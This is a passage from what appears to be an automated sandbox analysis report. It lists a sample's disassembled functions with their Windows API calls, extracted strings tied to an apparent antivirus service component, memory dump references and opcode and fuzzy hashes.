                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                                      • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                                      • API String ID: 2587151837-1427723692
                                                      • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                      • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                                      • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                      • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                                      Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                                      • String ID: SetDllDirectoryW$kernel32.dll
                                                      • API String ID: 3184163350-3826188083
                                                      • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                      • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                                      • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                      • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                                      Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcesslstrlen
                                                      • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                      • API String ID: 3424473247-996641649
                                                      • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                      • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                                      • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                      • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                                      Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: String$ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1775797328-0
                                                      • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                      • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                                      • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                      • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                                      Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                                      • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                                      • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                                      • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                                      • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                                      • String ID:
                                                      • API String ID: 1232609184-0
                                                      • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                      • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                                      • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                      • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                                      Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                                      • String ID: H
                                                      • API String ID: 2107338056-2852464175
                                                      • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                      • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                                      • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                      • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                                      Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                                      • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                                      • API String ID: 1322048431-2685357988
                                                      • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                      • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                                      • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                      • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                                      Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                      • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                                      • API String ID: 2984211723-3002863673
                                                      • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                      • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                                      • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                      • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                                      Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                                      • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                                      • API String ID: 678758403-4129911376
                                                      • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                      • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                                      • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                      • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                                      Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcesslstrlen
                                                      • String ID:
                                                      • API String ID: 3424473247-0
                                                      • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                      • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                                      • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                      • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                                      Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                                      • String ID: bad exception$csm$csm$csm
                                                      • API String ID: 3766904988-820278400
                                                      • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                      • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                                      • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                      • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                                      Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                                      • String ID:
                                                      • API String ID: 2707001247-0
                                                      • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                      • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                                      • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                      • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                                      Function 00007FF8FF5D4804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 849930591-393685449
                                                      • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                      • Instruction ID: 16d4eb7fb35f376b25f97401c618ddd63eeca4a0545392bda85b8bfcfd9efb4e
                                                      • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                      • Instruction Fuzzy Hash: 26D15F22A0D7818BEB209B6598803AD77A0FB697D8F100235DABD57BD6DF38E481C700
                                                      Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                      • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                                      • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                      • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                                      Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                      • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                                      • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                      • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                                      Function 00007FF8FF5DB86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeLibraryProc
                                                      • String ID: api-ms-$ext-ms-
                                                      • API String ID: 3013587201-537541572
                                                      • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                      • Instruction ID: fb18ae1b9f8b9d7544fc3065d8769be4d8d0cd32ebc3f891ac31893e3e5d33db
                                                      • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                      • Instruction Fuzzy Hash: 9841B321B1EA426AEB158B169C505BE2292BF2DBE4F494735DD3D877D8EF3CE4458300
                                                      Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                                      • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                      • API String ID: 1119674940-1966266597
                                                      • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                      • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                                      • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                      • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                                      Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcesslstrlen$ComputerName
                                                      • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                      • API String ID: 3702919091-996641649
                                                      • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                      • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                                      • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                      • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                                      Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
